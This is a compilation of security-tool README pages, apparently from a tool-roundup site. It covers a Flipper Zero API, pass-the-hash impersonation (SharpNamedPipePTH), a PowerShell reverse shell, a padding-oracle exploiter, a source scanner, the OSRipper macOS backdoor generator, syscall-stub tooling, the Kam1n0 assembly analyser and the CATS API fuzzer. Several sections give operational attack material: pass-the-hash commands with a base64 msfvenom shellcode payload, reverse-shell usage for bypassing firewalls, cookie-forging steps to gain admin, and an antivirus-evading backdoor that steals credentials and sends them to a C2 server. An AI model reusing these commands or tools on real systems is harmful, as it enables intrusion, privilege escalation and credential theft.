The generated Lorem Ipsum is therefore always free from repetition, injected humour, or non-characteristic words etc.
"""
flipper.storage.write.send(text_two)

time.sleep(3)

#Don't forget to stop
flipper.storage.write.stop()

LED/Backlight

#Set generic led on (r,b,g,bl)
flipper.led.set(led='r', value=255)

#Set blue led off
flipper.led.blue(value=0)

#Set green led value
flipper.led.green(value=175)

#Set backlight on
flipper.led.backlight_on()

#Set backlight off
flipper.led.backlight_off()

#Turn off led
flipper.led.off()

Vibro

#Set vibro True or False
flipper.vibro.set(True)

#Set vibro on
flipper.vibro.on()

#Set vibro off
flipper.vibro.off()

GPIO

#Set gpio mode: 0 - input, 1 - output
flipper.gpio.mode(pin_name=PIN_NAME, value=1)

#Read gpio pin value
flipper.gpio.read(pin_name=PIN_NAME)

#Set gpio pin value
flipper.gpio.mode(pin_name=PIN_NAME, value=1)

MusicPlayer

#Play song in RTTTL format
rttl_song = "Littleroot Town - Pokemon:d=4,o=5,b=100:8c5,8f5,8g5,4a5,8p,8g5,8a5,8g5,8a5,8a#5,8p,4c6,8d6,8a5,8g5,8a5,8c#6,4d6,4e6,4d6,8a5,8g5,8f5,8e5,8f5,8a5,4d6,8d5,8e5,2f5,8c6,8a#5,8a#5,8a5,2f5,8d6,8a5,8a5,8g5,2f5,8p,8f5,8d5,8f5,8e5,4e5,8f5,8g5"

#Play in loop
flipper.music_player.play(rtttl_code=rttl_song)

#Stop loop
flipper.music_player.stop()

#Play for 20 seconds
flipper.music_player.play(rtttl_code=rttl_song, duration=20)

#Beep
flipper.music_player.beep()

#Beep for 5 seconds
flipper.music_player.beep(duration=5)

NFC

#Synchronous default timeout 5 seconds

#Detect NFC
nfc_detected = flipper.nfc.detect()

#Emulate NFC
flipper.nfc.emulate()

#Activate field
flipper.nfc.field()

RFID

#Synchronous default timeout 5 seconds

#Read RFID
rfid = flipper.rfid.read()

SubGhz

#Transmit hex_key N times(default count = 10)
flipper.subghz.tx(hex_key="DEADBEEF", frequency=433920000, count=5)

#Decode raw .sub file
decoded = flipper.subghz.decode_raw(sub_file="/ext/subghz/foo.sub")

Infrared

#Transmit hex_address and hex_command selecting a protocol
flipper.ir.tx(protocol="Samsung32", hex_address="C000FFEE", hex_command="DEADBEEF")

#Raw Transmit samples
flipper.ir.tx_raw(frequency=38000, duty_cycle=0.33, samples=[1337, 8888, 3000, 5555])

#Synchronous default timeout 5 seconds
#Receive tx
r = flipper.ir.rx(timeout=10)

IKEY

#Read (default timeout 5 seconds)
ikey = flipper.ikey.read()

#Write (default timeout 5 seconds)
ikey = flipper.ikey.write(key_type="Dallas", key_data="DEADBEEFCOOOFFEE")

#Emulate (default timeout 5 seconds)
flipper.ikey.emulate(key_type="Dallas", key_data="DEADBEEFCOOOFFEE")

Log

#Attach event logger (default timeout 10 seconds)
logs = flipper.log.attach()

Debug

#Activate debug mode
flipper.debug.on()

#Deactivate debug mode
flipper.debug.off()

Onewire

#Search
response = flipper.onewire.search()

I2C

#Get
response = flipper.i2c.get()

Input

#Input dump
dump = flipper.input.dump()

#Send input
flipper.input.send("up", "press")

Optimizations

Feel free to contribute in any way

  • Queue Thread orchestrator (check dev branch)
  • Implement all the cli functions
  • Async SubGhz Chat (check dev branch)

License

MIT

Buy me a pint

ZEC: zs13zdde4mu5rj5yjm2kt6al5yxz2qjjjgxau9zaxs6np9ldxj65cepfyw55qvfp9v8cvd725f7tz7

ETH: 0xef3cF1Eb85382EdEEE10A2df2b348866a35C6A54

BTC: 15umRZXBzgUacwLVgpLPoa2gv7MyoTrKat

Contacts

  • Discord: white_rabbit#4124
  • Twitter: @nic_whr
  • GPG: 0x94EDEADC


SharpNamedPipePTH - Pass The Hash To A Named Pipe For Token Impersonation


This project is a C# tool to use Pass-the-Hash for authentication on a local Named Pipe for user Impersonation. You need a local administrator or SEImpersonate rights to use this. There is a blog post for explanation:

https://s3cur3th1ssh1t.github.io/Named-Pipe-PTH/

It is heavily based on the code from the project Sharp-SMBExec.

I faced certain Offensive Security project situations in the past, where I already had the NTLM-Hash of a low privileged user account and needed a shell for that user on the current compromised system - but that was not possible with the current public tools. Imagine two more facts for a situation like that - the NTLM Hash could not be cracked and there is no process of the victim user to execute shellcode in it or to migrate into that process. This may sound like an absurd edge-case for some of you. I still experienced that multiple times. Not only in one engagement I spend a lot of time searching for the right tool/technique in that specific situation.

My personal goals for a tool/technique were:

  • Fully featured shell or C2-connection as the victim user-account
  • It must to able to also Impersonate low privileged accounts - depending on engagement goals it might be needed to access a system with a specific user such as the CEO, HR-accounts, SAP-administrators or others
  • The tool can be used as C2-module

The impersonated user unfortunately has no network authentication allowed, as the new process is using an Impersonation Token which is restricted. So you can only use this technique for local actions with another user.

There are two ways to use SharpNamedPipePTH. Either you can execute a binary (with or without arguments):

SharpNamedPipePTH.exe username:testing hash:7C53CFA5EA7D0F9B3B968AA0FB51A3F5 binary:C:\windows\system32\cmd.exe

SharpNamedPipePTH.exe username:testing domain:localhost hash:7C53CFA5EA7D0F9B3B968AA0FB51A3F5 binary:"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" arguments:"-nop -w 1 -sta -enc bgBvAHQAZQBwAGEAZAAuAGUAeABlAAoA"

Or you can execute shellcode as the other user:

SharpNamedPipePTH.exe username:testing domain:localhost hash:7C53CFA5EA7D0F9B3B968AA0FB51A3F5 shellcode:/EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpV////11IugEAAAAAAAAASI2NAQEAAEG6MYtvh//Vu+AdKgpBuqaVvZ3/1UiDxCg8BnwKgPvgdQW7RxNyb2oAWUGJ2v/VY21kLmV4ZQA=

Which is msfvenom -p windows/x64/exec CMD=cmd.exe EXITFUNC=threadmsfvenom -p windows/x64/exec CMD=cmd.exe EXITFUNC=thread | base64 -w0.

I'm not happy with the shellcode execution yet, as it's currently spawning notepad as the impersonated user and injects shellcode into that new process via D/Invoke CreateRemoteThread Syscall. I'm still looking for possibility to spawn a process in the background or execute shellcode without having a process of the target user for memory allocation.



PSAsyncShell - PowerShell Asynchronous TCP Reverse Shell


PSAsyncShell is an Asynchronous TCP Reverse Shell written in pure PowerShell.

Unlike other reverse shells, all the communication and execution flow is done asynchronously, allowing to bypass some firewalls and some countermeasures against this kind of remote connections.

Additionally, this tool features command history, screen wiping, file uploading and downloading, information splitting through chunks and reverse Base64 URL encoded traffic.


Requirements

  • PowerShell 4.0 or greater

Download

It is recommended to clone the complete repository or download the zip file. You can do this by running the following command:

git clone https://github.com/JoelGMSec/PSAsyncShell

Usage

.\PSAsyncShell.ps1 -h

____ ____ _ ____ _ _ _
| _ \/ ___| / \ ___ _ _ _ __ ___/ ___|| |__ ___| | |
| |_) \___ \ / _ \ / __| | | | '_ \ / __\___ \| '_ \ / _ \ | |
| __/ ___) / ___ \\__ \ |_| | | | | (__ ___) | | | | __/ | |
|_| |____/_/ \_\___/\__, |_| |_|\___|____/|_| |_|\___|_|_|
|___/

---------------------- by @JoelGMSec -----------------------

Info: This tool helps you to get a remote shell
over asynchronous TCP to bypass firewalls

Usage: .\PSAsyncShell.ps1 -s -p listen_port
Listen for a new connection from the client

.\PSAsyncShell.ps1 -c server_ip server_port
Connect the client to a PSAsyncShell server

Warning: All info betwen parts will be sent unencrypted
Download & Upload functions don't use MultiPart

The detailed guide of use can be found at the following link:

https://darkbyte.net/psasyncshell-bypasseando-firewalls-con-una-shell-tcp-asincrona

License

This project is licensed under the GNU 3.0 license - see the LICENSE file for more details.

Credits and Acknowledgments

This tool has been created and designed from scratch by Joel Gámez Molina // @JoelGMSec

Contact

This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.

For more information, you can find me on Twitter as @JoelGMSec and on my blog darkbyte.net.



Pax - CLI Tool For PKCS7 Padding Oracle Attacks


Exploit padding oracles for fun and profit!

Pax (PAdding oracle eXploiter) is a tool for exploiting padding oracles in order to:

  1. Obtain plaintext for a given piece of CBC encrypted data.
  2. Obtain encrypted bytes for a given piece of plaintext, using the unknown encryption algorithm used by the oracle.

This can be used to disclose encrypted session information, and often to bypass authentication, elevate privileges and to execute code remotely by encrypting custom plaintext and writing it back to the server.

As always, this tool should only be used on systems you own and/or have permission to probe!


Installation

Download from releases, or install with Go:

go get -u github.com/liamg/pax/cmd/pax

Example Usage

If you find a suspected oracle, where the encrypted data is stored inside a cookie named SESS, you can use the following:

pax decrypt --url https://target.site/profile.php --sample Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D --block-size 16 --cookies "SESS=Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D"

This will hopefully give you some plaintext, perhaps something like:

 {"user_id": 456, "is_admin": false}

It looks like you could elevate your privileges here!

You can attempt to do so by first generating your own encrypted data that the oracle will decrypt back to some sneaky plaintext:

pax encrypt --url https://target.site/profile.php --sample Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D --block-size 16 --cookies "SESS=Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D" --plain-text '{"user_id": 456, "is_admin": true}'

This will spit out another base64 encoded set of encrypted data, perhaps something like:

dGhpcyBpcyBqdXN0IGFuIGV4YW1wbGU=

Now you can open your browser and set the value of the SESS cookie to the above value. Loading the original oracle page, you should now see you are elevated to admin level.

How does this work?

The following are great guides on how this attack works:



SCodeScanner - Stands For Source Code Scanner Where The User Can Scans The Source Code For Finding The Critical Vulnerabilities


SCodeScanner stands for Source Code scanner where the user can scans the source code for finding the Critical Vulnerabilities. The main objective for this scanner is to find the vulnerabilities inside the source code before code gets published in Prod.


Features

  1. Supported PHP Language
  2. Supported YAML Language
  3. Pass results to bug tracking services like Jira also Slack (Sending files to group to multiple people at once).
  4. Gives results in JSON format, which can easily be used to any other program.
  5. Works with Rules. We only need to create some rules which the target rule is not present in php/yaml directory.
  6. Rules that can scan advance patterns

Achievements

SCodeScanner received 5 CVEs for finding vulnerabilities in multiple CMS plugins.

  • CVE-2022-1465
  • CVE-2022-1474
  • CVE-2022-1527
  • CVE-2022-1532
  • CVE-2022-1604

How to run?

  • Download the repository -
  • Run pip3 install -r requirements.txt
  • And run python3 scscanner.py --help

Feedback/Imporvements

I would love to hear your feedback on this tool. Open issues if you found any. And open PR request if you have something.

Contact

Utkarsh Agrawal
Website



OSRipper - AV Evading OSX Backdoor And Crypter Framework


OSripper is a fully undetectable Backdoor generator and Crypter which specialises in OSX M1 malware. It will also work on windows but for now there is no support for it and it IS NOT FUD for windows (yet at least) and for now i will not focus on windows.

You can also PM me on discord for support or to ask for new features SubGlitch1#2983


Features

  • FUD (for macOS)
  • Cloacks as an official app (Microsoft, ExpressVPN etc)
  • Dumps; Sys info, Browser History, Logins, ssh/aws/azure/gcloud creds, clipboard content, local users etc. (more on Cedric Owens swiftbelt)
  • Encrypted communications
  • Rootkit-like Behaviour
  • Every Backdoor generated is entirely unique

Description

Please check the wiki for information on how OSRipper functions (which changes extremely frequently)

https://github.com/SubGlitch1/OSRipper/wiki

Here are example backdoors which were generated with OSRipper




 macOS .apps will look like this on vt

Getting Started

Dependencies

You need python. If you do not wish to download python you can download a compiled release. The python dependencies are specified in the requirements.txt file.

Since Version 1.4 you will need metasploit installed and on path so that it can handle the meterpreter listeners.

Installing

Linux

apt install git python -y
git clone https://github.com/SubGlitch1/OSRipper.git
cd OSRipper
pip3 install -r requirements.txt

Windows

git clone https://github.com/SubGlitch1/OSRipper.git
cd OSRipper
pip3 install -r requirements.txt

or download the latest release from https://github.com/SubGlitch1/OSRipper/releases/tag/v0.2.3

Executing program

Only this

sudo python3 main.py

Contributing

Please feel free to fork and open pull repuests. Suggestions/critisizm are appreciated as well

Roadmap

v0.1

  • ✅Get down detection to 0/26 on antiscan.me
  • ✅Add Changelog
  • ✅Daemonise Backdoor
  • ✅Add Crypter
  • ✅Add More Backdoor templates
  • ✅Get down detection to at least 0/68 on VT (for mac malware)

v0.2

  • ✅Add AntiVM
  • [] Implement tor hidden services
  • ✅Add Logger
  • ✅Add Password stealer
  • [] Add KeyLogger
  • ✅Add some new evasion options
  • ✅Add SilentMiner
  • [] Make proper C2 server

v0.3

Coming soon

Help

Just open a issue and ill make sure to get back to you

Changelog

  • 0.2.1

    • OSRipper will now pull all information from the Target and send them to the c2 server over sockets. This includes information like browser history, passwords, system information, keys and etc.
  • 0.1.6

    • Proccess will now trojanise itself as com.apple.system.monitor and drop to /Users/Shared
  • 0.1.5

    • Added Crypter
  • 0.1.4

    • Added 4th Module
  • 0.1.3

    • Got detection on VT down to 0. Made the Proccess invisible
  • 0.1.2

    • Added 3rd module and listener
  • 0.1.1

    • Initial Release

License

MIT

Acknowledgments

Inspiration, code snippets, etc.

Support

I am very sorry to even write this here but my finances are not looking good right now. If you appreciate my work i would really be happy about any donation. You do NOT have to this is solely optional

BTC: 1LTq6rarb13Qr9j37176p3R9eGnp5WZJ9T

Disclaimer

I am not responsible for what is done with this project. This tool is solely written to be studied by other security researchers to see how easy it is to develop macOS malware.



NimGetSyscallStub - Get Fresh Syscalls From A Fresh Ntdll.Dll Copy


Get fresh Syscalls from a fresh ntdll.dll copy. This code can be used as an alternative to the already published awesome tools NimlineWhispers and NimlineWhispers2 by @ajpc500 or ParallelNimcalls.

The advantage of grabbing Syscalls dynamically is, that the signature of the Stubs is not included in the file and you don't have to worry about changing Windows versions.

To compile the shellcode execution template run the following:

nim c -d:release ShellcodeInject.nim

The result should look like this:



Kam1n0 - Assembly Analysis Platform


Kam1n0 v2.x is a scalable assembly management and analysis platform. It allows a user to first index a (large) collection of binaries into different repositories and provide different analytic services such as clone search and classification. It supports multi-tenancy access and management of assembly repositories by using the concept of Application. An application instance contains its own exclusive repository and provides a specialized analytic service. Considering the versatility of reverse engineering tasks, Kam1n0 v2.x server currently provides three different types of clone-search applications: Asm-Clone, Sym1n0, and Asm2Vec, and an executable classification based on Asm2Vec. New application type can be further added to the platform.


A user can create multiple application instances. An application instance can be shared among a specific group of users. The application repository read-write access and on-off status can be controlled by the application owner. Kam1n0 v2.x server can serve the applications concurrently using several shared resource pools.

Kam1n0 was developed by Steven H. H. Ding and Miles Q. Li under the supervision of Benjamin C. M. Fung of the Data Mining and Security Lab at McGill University in Canada. It won the second prize at the Hex-Rays Plug-In Contest 2015. If you find Kam1n0 useful, please cite our paper:

  • S. H. H. Ding, B. C. M. Fung, and P. Charland. Kam1n0: MapReduce-based Assembly Clone Search for Reverse Engineering. In Proceedings of the 22nd ACM SIGKDD International Conference on Knowledge Discovery and Data Mining (SIGKDD), pages 461-470, San Francisco, CA: ACM Press, August 2016.

  • S. H. H. Ding, B. C. M. Fung, and P. Charland. Asm2Vec: boosting static representation robustness for binary clone search against code obfuscation and compiler optimization. In Proceedings of the 40th IEEE Symposium on Security and Privacy (S&P), 18 pages, San Francisco, CA: IEEE Computer Society, May 2019.

Asm-Clone

Asm-Clone applications try to solve the efficient subgraph search problem (i.e. graph isomorphism problem) for assembly functions (<1.3s average query time and <30ms average index time with 2.3M functions). Given a target function (the one on the left as shown below), it can identify the cloned subgraphs among other functions in the repository (the one on the right as shown below).

  • Application Type: Asm-Clone
  • The original clone search service used in Kam1n0 v1.x.
  • Currently support Meta-PC, ARM, PowerPC, and TMS320c6 (experimental).
  • Support subgraph clone search within a certain assembly code family.
    • + Good interpretability of the result: breaks down to subgraphs.
    • + Accurate for searching within the given code family.
    • + Good for differing various patches or versions for big binaries.
    • - Relatively more sensitive to instruction set changes, optimizations, and obfuscation.
    • - Need to pre-define the syntax of the assembly code language.
    • - Need to have assembly code of the same chosen family in the repository.

 

Sym1n0

Semantic clone search by differentiated fuzz testing and constraint solving. An efficient and scalable dynamic-static hybrid approach (<1s average query time and <100ms average index time with 1.5M functions). Given a target function (the one on the left as shown below), it can identify the cloned subgraphs among other functions in the repository (the one on the right as shown below). Support visualization of abstract syntax graph.

  • Application Type: Sym1n0 (v2 only)
  • Clone search by both symbolic execution and concrete execution.
  • Differentiate functions based on their different I/O behavior.
  • Clone search conducted on the abstract syntax graph constructed from Vex IR (powered by LibVex).
    • + Clone search across different assembly code families.
      • For example, indexed x86 binaries but the query is ARM code.
    • + Subgraph clone search.
    • + Support a wide range of families throub LibVex.
      • x86, AMD64, MIPS32, MIPS64, PowerPC32, PowerPC64, ARM32, and ARM64.
    • + An efficient dynamic-static hybrid approach.
    • + Ideal for analyzing firmware compiled for different processors.
    • - Sensitive to heavy graph manipulation (such as a full flattening).
    • - Sensitive to large scale breakdown of basic block integrity.

 

Asm2Vec

Asm2Vec leverages representation learning. It understands the lexical semantic relationship of assembly code. For example, xmm* registers are semantically related to vector operations such as addps. memcpy is similar to strcpy. The graph below shows different assembly functions compiled from the same source code of gmpz_tdiv_r_2exp in libgmp. From left to right, the assembly functions are compiled with GCC O0 option, GCC O3 option, O-LLVM obfuscator Control Flow Graph, Flattening option, and LLVM obfuscator Bogus Control Flow Graph option. Asm2Vec can statically identify them as clones.

  • Leverage representation learning.
  • Understand the lexical semantic relationship of assembly code.
    • + State-of-the-art for clone search against heavy code obfuscation techniques.
      • (>0.8 accuracy for all options applied in O-LLVM, multiple iterations).
    • + State-of-the-art for clone search against code optimization.
      • (>0.8 accuracy between O0 and O3, >0.94 accuracy between O2 and O3)
    • + Even better result than the most recent dynamic approach.
    • + Much more efficient than recent dynamic approaches.
    • + Do not need to define the architecture. It self-learns by reading large volume of code.
    • + Static approach: efficient and scalable.
    • - No subgraphs.
    • - Assume the assembly code come from the same processor family.
    • - Static approach: cannot recognize jump table, etc.

 

Executable Classification

In this application, the user defines a set of software classes which are based on functional relatedness and provides binaries belong to each class. Then the system automatically groups functions into clusters in which functions are connected directly or indirectly by clone relation. The clusters that are discriminative for the classification are kept and serve as signatures of their classes. Given a target binary, the system shows the degree it belongs to each software class.


  • Use Asm2Vec as its function similarity computation model

    • + Provide interpretable classification results.
    • + Learn common characteristics (i.e., function clusters) of each class.
    • + Able to handle smaller and imbalanced datasets than an ordinary machine learning model.
    • - The limitation is that the assumption that binaries in the same class share some common functions must hold for the system to work.

     

Platform Overview

The figure below shows the major UI components and functionalities of Kam1n0 v2.x. We adopt a material design. In general, each user has an application list, a running-job list, and a result file list.

  • Application list shows the application instances owned by the user and shared by the others.
  • Running-job list shows the running progress for a large query (such as chrome.dll) and indexing procedure.
  • Result file list displays the saved results. More details of the UI design can be found in our detailed tutorial.


Installation Instruction

The current release of Kam1n0 consists of two installers: the core server and IDA Pro plug-in.

Installer Included components Description
Kam1n0-Server.msi Core engine Main engine providing service for indexing and searching.
Workbench A user interface to manage the repositories and running service.
Web user interface Web user interface for searching/indexing binary files and assembly functions.
Visual C++ redistributable for VS 15 Dependecy for z3.
Kam1n0-IDA-Plugin.msi Plug-in Connectors and user interface.
PyPI wheels for Cefpython Rendering engine for the user interface.
PyPI and dependent wheels Package management for Python. Included for IDA 6.8 &6.9.

Installing the Kam1n0 Server

The Kam1n0 core engine is purely written in Java. You need the following dependencies:

  • [Required] The latest x64 11.x JRE/JDK distribution from Oracle.
  • [Optional] The latest version of IDA Pro with the idapython plug-in installed. The Python plug-in and runtime should have already been installed with IDA Pro. Reinstall IDA Pro if necessary.

Download the Kam1n0-Server.msi file from our release page. Follow the instructions to install the server. You will be prompted to select an installation path. IDA Pro is optional if the server does not have to deal with any disassembling. In other words, the client side uses the Kam1n0 plugin for IDA Pro. It is strongly suggested to have the IDA Pro installed with the Kam1n0 server. Kam1n0 server will automatically detect your IDA Pro by looking for the default application that you used to open .i64 file.

Installing the IDA Pro Plug-in

The Kam1n0 IDA Pro plug-in is written in Python for the logic and in HTML/JavaScript for the rendering. The following dependencies are required for its installation:

  • [Required] IDA Pro (>6.7) with the idapython plug-in installed. The Python plug-in and runtime should have already been installed with IDA Pro. Reinstall IDA Pro if necessary.

Next, download the Kam1n0-IDA-Plugin.msi installer from our release page. Follow the instructions to install the plug-in and runtime. Please note that the plug-in has to be installed in the IDA Pro plugins folder which is located at $IDA_PRO_PATH$/plugins. For example, on Windows, the path could be C:/Program Files (x86)/IDA 6.95/plugins. The installer will detect and validate the path.

Setting Up Kam1n0 on Ubuntu/Debian-based systems

  • Ensure you have the Oracle version of Java 11. (Not default-jdk in apt.)

    • Add Oracle's PPA and then update your package repository: sudo add-apt-repository ppa:webupd8team/java
      • If you encounter any errors (such as ~webupd8team not found), if you are on a proxy, make sure you set and export your http_proxy and https_proxy environment variables, and then try again with the -E option on sudo. Additionally, if you are getting a 'add-apt repository command not found error, try: sudo apt install -y software-properties-common.
    • Afterwards: sudo apt-get update, and sudo apt-get install oracle-java8-installer
      • Verify your Java version with java -version; you may need to manually set the JAVA_HOME environment variable (in /etc/environment), JAVA_HOME=/usr/lib/jvm/java-11-oracle
  • Download the latest release for Linux (Kam1n0-IDA-Plugin.tar.gz and Kam1n0-Server.tar.gz) from Kam1n0-Community.

  • Extract the two tarballs (i.e. tar –xvzf Kam1n0-IDA-Plugin.tar.gz and tar –xvzf Kam1n0-Server.tar.gz)

  • The Kam1n0-Server.tar.gz file will create the server directory.

  • Inside the server directory, you should see a file called kam1n0.properties, which is where you will set various configurations for kam1n0; this is very important.

  • Set kam1n0.data.path to where you would like your kam1n0-related data to be written to. We choose to put it in the same place that we keep our server. kam1n0.ida.home refers to where your IDA installation is located. Comment this line (and kam1n0.ida.batch, the line following) if you do not have IDA and don't plan to use kam1n0 for disassembly. For more (accurate) information about the kam1n0.properties file, see the kam1n0.properties.explained file.

  • Run kam1n0-server-workbench: java -jar kam1n0-server-workbench.jar. This should cause a window to pop up, which prompts you to actually start kam1n0. Alternatively, run kam1n0-server: java -jar kam1n0-server.jar --start. This starts the server from the console without a window.

  • To connect and use it, go to 127.0.0.1:8571 (the default port kam1n0 listens on should be 8571, but can be changed in kam1n0.properties) in your browser. You should see the pretty kam1n0 web UI. From there, follow the tutorial on the Kam1n0-Community repo if you do not know how to use kam1n0.

Backward Compatibility

The assembly code repositories and configuration files used in previous versions (<2.0.0) are no longer supported by the latest version. Please contact us if you need to migrate your old repositories.

Documentation

Development

Clone the latest stable branch (don't forget --recursive!):

git clone --recursive -b master2.x --single-branch https://github.com/McGill-DMaS/Kam1n0-Community

Importing the project.

IntelliJ: Import the root /kam1n0/kam1n0/ as a maven project. All the submodules will be loaded accordingly. EclipseEE: Add the cloned git repository to the git view. Import all maven projects from the git repository. You may need to modify the classpath to address any error. All the resources path are dynamically modified when running inside an IDE (through the kam1n0-resources submodule).

To build the project:

cd /kam1n0/kam1n0
mvn -DskipTests clean package
mvn -DskipTests package

The resulting binaries can be found in /kam1n0/build-bins/

To run the test code, you will need to first download chromedriver.exe from http://chromedriver.chromium.org/ and add its absolute path into an environment variable named webdriver.chrome.driver. It is also required that there is a chrome browser installed in the system. The test code will launch a browser instance to test the UI interfaces. The complete testing procedure will take approximately 3 hours.

cd /kam1n0/kam1n0
mvn -DskipTests clean package # you can skip this one if you already built the package
mvn -DskipTests package # you can skip this one if you already built the package
mvn -DforkMode=never test

These commands only compiles java with pre-compiled wheels of libvex and z3. It works out-of-the-box. The build of libvex and z3 is platform-dependent. We use a fork of libvex from Angr. More serious build scripts as well as installers for windows/linux can be found under /kam1n0-builds/

  • kam1n0: The server's source code.
  • kam1n0-builds: Installer source code and scripts to build the distribution.
  • kam1n0-clients: The clients' source code.

Binary Releases

We have a Jenkin server for contineous development and delivery. Latest stable release will be posted here. Periodically we will synchronize our internal experimental branch with this repository.

Licensing

The software was developed by Steven H. H. Ding, Miles Q. Li, and Benjamin C. M. Fung in the McGill Data Mining and Security Lab and Queen's L1NNA Research Laboratory in Canada. It is distributed under the Apache License Version 2.0. Please refer to LICENSE.txt for details.

Copyright 2014-2021 McGill University and the Researchers. All rights reserved.



CATS - REST API Fuzzer And Negative Testing Tool For OpenAPI Endpoints


REST API fuzzer and negative testing tool. Run thousands of self-healing API tests within minutes with no coding effort!

  • Comprehensive: tests are generated automatically based on a large number scenarios and cover every field and header
  • Intelligent: tests are generated based on data types and constraints; each Fuzzer have specific expectations depending on the scenario under test
  • Highly Configurable: high amount of customization: you can exclude specific Fuzzers, HTTP response codes, provide business context and a lot more
  • Self-Healing: as tests are generated, any OpenAPI spec change is picked up automatically
  • Simple to Learn: flat learning curve, with intuitive configuration and syntax
  • Fast: automatic process for write, run and report tests which covers thousands of scenarios within minutes

Overview

By using a simple and minimal syntax, with a flat learning curve, CATS (Contract Auto-generated Tests for Swagger) enables you to generate thousands of API tests within minutes with no coding effort. All tests are generated, run and reported automatically based on a pre-defined set of 89 Fuzzers. The Fuzzers cover a wide range of input data from fully random large Unicode values to well crafted, context dependant values based on the request data types and constraints. Even more, you can leverage the fact that CATS generates request payloads dynamically and write simple end-to-end functional tests.


Please check the Slicing Strategies section for making CATS run fast and comprehensive in the same time.

Tutorials on how to use CATS

This is a list of articles with step-by-step guides on how to use CATS:

Some bugs found by CATS

Installation

Homebrew

> brew tap endava/tap
> brew install cats

Manual

CATS is bundled both as an executable JAR or a native binary. The native binaries do not need Java installed.

After downloading your OS native binary, you can add it in classpath so that you can execute it as any other command line tool:

sudo cp cats /usr/local/bin/cats

You can also get autocomplete by downloading the cats_autocomplete script and do:

source cats_autocomplete

To get persistent autocomplete, add the above line in ~/.zshrc or ./bashrc, but make sure you put the fully qualified path for the cats_autocomplete script.

You can also check the cats_autocomplete source for alternative setup.

There is no native binary for Windows, but you can use the uberjar version. This requires Java 11+ to be installed.

You can run it as java -jar cats.jar.

Head to the releases page to download the latest versions: https://github.com/Endava/cats/releases.

Build

You can build CATS from sources on you local box. You need Java 11+. Maven is already bundled.

Before running the first build, please make sure you do a ./mvnw clean. CATS uses a fork ok OKHttpClient which will install locally under the 4.9.1-CATS version, so don't worry about overriding the official versions.

You can use the following Maven command to build the project:

./mvnw package -Dquarkus.package.type=uber-jar

cp target/

You will end up with a cats.jar in the target folder. You can run it wih java -jar cats.jar ....

You can also build native images using a GraalVM Java version.

./mvnw package -Pnative

Note: You will need to configure Maven with a Github PAT with read-packages scope to get some dependencies for the build.

Notes on Unit Tests

You may see some ERROR log messages while running the Unit Tests. Those are expected behaviour for testing the negative scenarios of the Fuzzers.

Running CATS

Blackbox mode

Blackbox mode means that CATS doesn't need any specific context. You just need to provide the service URL, the OpenAPI spec and most probably authentication headers.

> cats --contract=openapy.yaml --server=http://localhost:8080 --headers=headers.yml --blackbox

In blackbox mode CATS will only report ERRORs if the received HTTP response code is a 5XX. Any other mismatch between what the Fuzzer expects vs what the service returns (for example service returns 400 and service returns 200) will be ignored.

The blackbox mode is similar to a smoke test. It will quickly tell you if the application has major bugs that must be addressed immediately.

Context mode

The real power of CATS relies on running it in a non-blackbox mode also called context mode. Each Fuzzer has an expected HTTP response code based on the scenario under test and will also check if the response is matching the schema defined in the OpenAPI spec specific to that response code. This will allow you to tweak either your OpenAPI spec or service behaviour in order to create good quality APIs and documentation and also to avoid possible serious bugs.

Running CATS in context mode usually implies providing it a --refData file with resource identifiers specific to the business logic. CATS cannot create data on its own (yet), so it's important that any request field or query param that requires pre-existence of those entities/resources to be created in advance and added to the reference data file.

> cats --contract=openapy.yaml --server=http://localhost:8080 --headers=headers.yml --refData=referenceData.yml

Notes on skipped Tests

You may notice a significant number of tests marked as skipped. CATS will try to apply all Fuzzers to all fields, but this is not always possible. For example the BooleanFieldsFuzzer cannot be applied to String fields. This is why that test attempt will be marked as skipped. It was an intentional decision to also report the skipped tests in order to show that CATS actually tries all the Fuzzers on all the fields/paths/endpoints.

Additionally, CATS support a lot more arguments that allows you to restrict the number of fuzzers, provide timeouts, limit the number of requests per minute and so on.

Understanding how CATS works and reports results

CATS generates tests based on configured Fuzzers. Each Fuzzer has a specific scenario and a specific expected result. The CATS engine will run the scenario, get the result from the service and match it with the Fuzzer expected result. Depending on the matching outcome, CATS will report as follows:

  • INFO/SUCCESS is expected and documented behaviour. No need for action.
  • WARN is expected but undocumented behaviour or some misalignment between the contract and the service. This will ideally be actioned.
  • ERROR is abnormal/unexpected behaviour. This must be actioned.

CATS will iterate through all endpoints, all HTTP methods and all the associated requests bodies and parameters (including multiple combinations when dealing with oneOf/anyOf elements) and fuzz their values considering their defined data type and constraints. The actual fuzzing depends on the specific Fuzzer executed. Please see the list of fuzzers and their behaviour. There are also differences on how the fuzzing works depending on the HTTP method:

  • for methods with request bodies like POST, PUT the fuzzing will be applied at the request body data models level
  • for methods without request bodies like GET, DELETE the fuzzing will be applied at the URL parameters level

This means that for methods with request bodies (POST,PUT) that have also URL/path parameters, you need to supply the path parameters via urlParams or the referenceData file as failure to do so will result in Illegal character in path at index ... errors.

Interpreting Results

HTML_JS

HTML_JS is the default report produced by CATS. The execution report in placed a folder called cats-report/TIMESTAMP or cats-report depending on the --timestampReports argument. The folder will be created inside the current folder (if it doesn't exist) and for each run a new subfolder will be created with the TIMESTAMP value when the run started. This allows you to have a history of the runs. The report itself is in the index.html file, where you can:

  • filter test runs based on the result: All, Success, Warn and Error
  • filter based on the Fuzzer so that you can only see the runs for that specific Fuzzer
  • see summary with all the tests with their corresponding path against they were run, and the result
